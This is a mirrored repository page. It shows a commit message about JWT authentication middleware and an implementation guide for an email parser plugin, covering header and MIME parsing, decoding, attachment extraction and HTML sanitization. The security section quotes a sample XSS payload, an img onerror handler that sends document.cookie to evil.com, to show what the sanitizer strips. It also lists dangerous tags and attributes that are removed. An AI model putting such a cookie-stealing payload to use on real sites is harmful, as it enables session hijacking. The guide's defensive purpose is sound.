mirror of https://github.com/johndoe6345789/metabuilder.git synced 2026-04-25 14:25:02 +00:00

Files

johndoe6345789 df5398a7ee feat(auth): Phase 7 Flask authentication middleware with JWT and multi-tenant isolation

Complete implementation of enterprise-grade authentication middleware for email service:

Features:
- JWT token creation/validation with configurable expiration
- Bearer token extraction and validation
- Multi-tenant isolation enforced at middleware level
- Role-based access control (RBAC) with user/admin roles
- Row-level security (RLS) for resource access
- Automatic request logging with user context and audit trail
- CORS configuration for email client frontend
- Rate limiting (50 req/min per user with Redis backend)
- Comprehensive error handling with proper HTTP status codes

Implementation:
- Enhanced src/middleware/auth.py (415 lines)
  - JWTConfig class for token management
  - create_jwt_token() for token generation
  - decode_jwt_token() for token validation
  - @verify_tenant_context decorator for auth middleware
  - @verify_role decorator for RBAC
  - verify_resource_access() for row-level security
  - log_request_context() for audit logging

Testing:
- 52 comprehensive test cases covering all features
- 100% pass rate with fast execution (0.15s)
- Test categories: JWT, multi-tenant, RBAC, RLS, logging, integration
- Full coverage of error scenarios and edge cases

Documentation:
- AUTH_MIDDLEWARE.md: Complete API reference and configuration guide
- AUTH_INTEGRATION_EXAMPLE.py: Real-world usage examples for 5+ scenarios
- PHASE_7_SUMMARY.md: Implementation summary with checklist
- Inline code documentation with type hints

Security:
- Multi-tenant data isolation at all levels
- Constant-time password comparison
- JWT signature validation
- CORS protection
- Rate limiting against abuse
- Comprehensive audit logging

Dependencies Added:
- PyJWT==2.8.1

Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>

2026-01-24 00:20:19 +00:00

13 KiB

Raw Permalink Blame History

Email Parser Plugin - Implementation Guide

Phase 6 of the email client architecture: RFC 5322 compliant email parsing with comprehensive MIME support.

Architecture Overview

The email parser is a workflow node executor that transforms raw RFC 5322 email messages into structured data compatible with the DBAL EmailMessage and EmailAttachment entities.

Flow

Raw IMAP Message (RFC 5322)
    ↓
[Email Parser Plugin]
    ├─ Parse Headers (RFC 5322)
    ├─ Parse MIME Structure (RFC 2045-2049)
    ├─ Extract Bodies (text/plain, text/html)
    ├─ Extract Attachments
    └─ Sanitize HTML (XSS Protection)
    ↓
Structured EmailMessage
    ├─ messageId, from, to, cc, bcc, replyTo
    ├─ subject, textBody, htmlBody
    ├─ headers (all key-value pairs)
    └─ attachments[] with metadata
    ↓
[DBAL Write Node]
    ├─ Store EmailMessage entity
    └─ Store EmailAttachment entities (one per file)

Implementation Details

1. Header Parsing (RFC 5322)

The parser implements RFC 5322 header field syntax:

header-field = field-name ":" field-body
field-name = 1*ftext
field-body = field-value [CRLF WSP field-value]  ; header folding

Key Features:

Case-insensitive header names
Support for folding (continuation lines)
Multiple values for same header (e.g., Received, X-Custom)
RFC 2047 encoded-word decoding for non-ASCII

Implementation:

private _parseHeaders(headersSection: string): Map<string, string | string[]>

Process:

Split by CRLF or LF
Check each line for continuation (starts with space/tab)
Store in case-insensitive Map
Handle duplicate headers as arrays

2. MIME Structure Parsing (RFC 2045-2049)

Multipart messages have recursive structure:

multipart/alternative
├─ text/plain (simple part)
├─ text/html (simple part)
└─ multipart/mixed
   ├─ text/plain
   └─ application/pdf (attachment)

Key Features:

Detect multipart messages via Content-Type: multipart/*
Extract boundary from Content-Type parameter
Split body by boundary delimiters (--boundary)
Parse each part recursively
Support nested multipart structures

Implementation:

private _parseMimePart(
  body: string,
  contentType: string,
  contentEncoding: string
): MimePart

Process:

Check if message is multipart
Extract boundary from Content-Type
Split body by boundary
For each part, recursively call _parseMimePart
Build tree structure

3. Body Extraction

Extract text and HTML bodies from MIME tree:

Strategy for multipart/alternative:

Prefer text/html if available
Fall back to text/plain if HTML not present
Skip both if neither found

Strategy for multipart/mixed:

First text/plain → textBody
First text/html → htmlBody
Other parts → attachments

Implementation:

private _extractBodies(
  mimePart: MimePart,
  sanitizeHtml: boolean,
  maxLength: number
): { textBody?: string; htmlBody?: string; sanitizationWarnings: number }

4. Content Encoding

Handle multiple content transfer encodings:

Encoding	Handling
`base64`	Decode using Buffer.from()
`quoted-printable`	Decode soft line breaks (=\r\n) and escape sequences (=XX)
`7bit`, `8bit`, `binary`	No transformation needed

Implementation:

private _decodeContent(content: string, encoding: string): string

5. HTML Sanitization

Remove XSS vectors while preserving content:

Dangerous Tags Removed:

Script execution: <script>, <style>
Embedding: <iframe>, <object>, <embed>, <applet>
Forms: <form>, <input>, <button>, <select>
SVG/Math: <svg>, <math>

Dangerous Attributes Removed:

Event handlers: onclick, onerror, onload, onchange, etc.
URLs with javascript: href="javascript:...", src="javascript:..."
Scripts in forms: formaction, action

Implementation:

private _sanitizeHtml(html: string): { html: string; warnings: number }

Process:

Remove script tags and content: <script>.*?</script>
Remove iframe tags: <iframe>.*?</iframe>
Remove style tags: <style>.*?</style>
Strip event handlers from all tags
Remove event handler attributes globally

Safety Notes:

Does NOT parse HTML into DOM (text-based replacement)
Does NOT load external resources
Does NOT validate tag nesting
Conservative: Removes suspicious content

6. Attachment Extraction

Identify and catalog attachments:

Criteria for Attachment:

MIME part exists in multipart/mixed
Not in list of inline types (text/plain, text/html)
Has Content-Disposition header
Filename can be extracted from filename parameter

Metadata Collected:

filename: From Content-Disposition or Content-Type name parameter
mimeType: Extracted from Content-Type
size: Length of encoded content
contentId: For embedded resources (Content-ID header)
isInline: From Content-Disposition inline vs attachment
contentEncoding: Transfer encoding used
content: Optional base64 when extractSize < 10MB

Implementation:

private _extractAttachments(
  mimePart: MimePart,
  extractContent: boolean,
  maxSize: number
): { attachments: EmailAttachmentMetadata[]; ... }

Testing Strategy

Unit Tests

RFC 5322 Parsing
- Simple headers
- Multiple To addresses
- Display names in addresses
- Header folding with continuation lines
- Optional headers (CC, BCC, Reply-To)
MIME Multipart
- multipart/alternative (text + html)
- multipart/mixed (body + attachments)
- Nested multipart structures
- Boundary handling edge cases
Content Encoding
- Base64 decoding
- Quoted-printable decoding
- 7bit, 8bit, binary pass-through
HTML Sanitization
- Script tag removal
- Event handler removal
- iframe removal
- Safe HTML preservation
Attachment Extraction
- Attachment cataloging
- Inline vs attachment detection
- Size limit enforcement
- Content extraction control
Error Handling
- Missing From header
- Missing To header
- Invalid MIME structure
- Parsing recovery
Real-World Scenarios
- Complete realistic emails
- Multiple attachments
- Complex nesting
- Unicode headers (RFC 2047)

Coverage Goals

Line coverage: 80%+
Branch coverage: 80%+
All error paths tested
Edge cases (empty headers, no body, etc.)

Integration Points

With IMAP Sync Plugin

IMAP Sync fetches raw message from IMAP server:

// IMAP returns raw RFC 5322 message
const rawMessage = await imapClient.fetchMessage(messageId, 'BODY[]');

// Parser receives it
const config: EmailParserConfig = {
  rawMessage,      // ← Raw RFC 5322 format
  tenantId: user.tenantId
};

With DBAL Storage

Parser output matches DBAL entity schema:

// Parser output
const message: ParsedEmailMessage = {
  messageId: "<123@example.com>",
  from: "alice@example.com",
  to: ["bob@example.com"],
  subject: "Meeting",
  textBody: "Let's meet at 2pm",
  htmlBody: "<p>Let's meet at 2pm</p>",
  attachments: [
    { filename: "agenda.pdf", mimeType: "application/pdf", ... }
  ]
};

// DBAL entity
const emailMessage: EmailMessage = {
  tenantId: user.tenantId,
  emailClientId: account.id,
  folderId: folder.id,
  messageId: message.messageId,
  from: message.from,
  to: JSON.stringify(message.to),  // JSON stored in DB
  subject: message.subject,
  textBody: message.textBody,
  htmlBody: message.htmlBody,
  headers: JSON.stringify(message.headers),
  receivedAt: new Date(message.receivedAt).getTime(),
  attachmentCount: message.attachments.length
};

// Attachments stored separately
for (const attachment of message.attachments) {
  const emailAttachment: EmailAttachment = {
    tenantId: user.tenantId,
    messageId: emailMessage.id,
    filename: attachment.filename,
    mimeType: attachment.mimeType,
    size: attachment.size,
    contentId: attachment.contentId,
    isInline: attachment.isInline,
    storageKey: `attachments/${emailMessage.id}/${attachment.filename}`,
    downloadUrl: generatePresignedUrl(...)
  };
}

Performance Considerations

Memory

Loads entire message into memory
Large messages (>100MB) may cause issues
Attachment content not extracted by default (metadata only)
For large attachments: Set extractAttachmentContent: false

Parsing Speed

Typical times:

Simple text: <1ms
Text + HTML: 2-5ms
With attachment: 5-10ms
Large HTML (5MB): 50-100ms

Optimization

Disable HTML sanitization if not needed (rare):

sanitizeHtml: false  // Faster, but less safe

Don't extract large attachment content:

extractAttachmentContent: false  // Metadata only

Limit body length:
```
maxBodyLength: 1024 * 1024  // 1MB cap
```

Set reasonable attachment limits:

maxAttachmentSize: 25 * 1024 * 1024  // Skip > 25MB

Security Considerations

XSS Prevention

The parser sanitizes all HTML to prevent stored XSS:

// Input (dangerous)
<img src="x" onerror="fetch('http://evil.com/steal?data=' + document.cookie)">

// Output (safe)
<img src="x">  // onerror removed

No Code Execution

The parser:

Does NOT execute JavaScript
Does NOT make HTTP requests
Does NOT access filesystem
Does NOT run arbitrary code

Multi-Tenant Safety

All parser operations include tenantId:

Used in workflow context
Passed to DBAL storage
Enforces row-level access control

No External Dependencies

The parser uses only Node.js built-in APIs:

Buffer for encoding/decoding
Regular expressions for parsing
No external npm packages

Error Recovery

Graceful Degradation

When non-critical errors occur:

{
  status: 'partial',
  message: ParsedEmailMessage,    // ← Still produced
  errors: [                        // ← Non-fatal errors listed
    { code: 'INVALID_MIME', message: '...', recoverable: true }
  ]
}

Recoverable vs Non-Recoverable

Non-Recoverable (no message output):

Missing From header
Missing To header
Total parse exception

Recoverable (message still output):

Malformed MIME structure
Invalid encoding in attachment
Header parsing issues
HTML sanitization warnings

Future Enhancements

Streaming Support
- Process large messages in chunks
- Reduce memory footprint
Async Content Extraction
- Store attachments to S3 during parsing
- Return only metadata
S/MIME and PGP
- Decrypt encrypted content
- Verify signatures
- Extract certificates
Better Charset Handling
- Detect charset from content
- Handle more encodings
Header Validation
- DKIM signature verification
- SPF/DMARC checking
Conversation Threading
- Group related messages
- Extract references (In-Reply-To, References)

Debugging

Enable Detailed Logging

In workflow execution context:

const result = await emailParserExecutor.execute(node, context, state);

// Check metrics
console.log('Parse time:', result.output.metrics.parseDurationMs);
console.log('Headers:', result.output.metrics.headerCount);
console.log('Parts:', result.output.metrics.partCount);
console.log('Attachments:', result.output.metrics.attachmentCount);

// Check warnings
if (result.output.warnings.length > 0) {
  console.warn('Warnings:', result.output.warnings);
}

// Check errors
if (result.output.errors.length > 0) {
  console.error('Errors:', result.output.errors);
}

Common Issues

Empty body after parsing
- Check if message has body at all
- Verify Content-Type multipart handling
- Check character encoding
Attachments not found
- Verify multipart/mixed structure
- Check Content-Disposition header
- Verify maxAttachmentSize limit
HTML missing after sanitization
- Check if HTML was actually present
- Review sanitization warnings count
- May have removed all content if too dangerous
Special characters garbled
- Check RFC 2047 encoding in header
- Verify charset parameter in Content-Type
- Buffer encoding during base64 decode

Contributing

To extend the parser:

Add new MIME type support in _extractBodies()
Add new sanitization rules in _sanitizeHtml()
Add encoding support in _decodeContent()
Add tests in index.test.ts
Update README.md with new features

References

RFC 5322 - Internet Message Format (SMTP)
RFC 2045-2049 - MIME (Multipurpose Internet Mail Extensions)
RFC 2047 - MIME Header Extensions for Non-ASCII Text
RFC 3501 - IMAP4rev1 (Mailbox Integration)
RFC 2183 - Content-Disposition Header Field
RFC 2387 - The MIME Multipart/Related Content-Type

13 KiB Raw Permalink Blame History

Email Parser Plugin - Implementation Guide

Architecture Overview

Flow

Implementation Details

1. Header Parsing (RFC 5322)

2. MIME Structure Parsing (RFC 2045-2049)

3. Body Extraction

4. Content Encoding

5. HTML Sanitization

6. Attachment Extraction

Testing Strategy

Unit Tests

Coverage Goals

Integration Points

With IMAP Sync Plugin

With DBAL Storage

Performance Considerations

Memory

Parsing Speed

Optimization

Security Considerations

XSS Prevention

No Code Execution

Multi-Tenant Safety

No External Dependencies

Error Recovery

Graceful Degradation

Recoverable vs Non-Recoverable

Future Enhancements

Debugging

Enable Detailed Logging

Common Issues

Contributing

References

See Also

13 KiB

Raw Permalink Blame History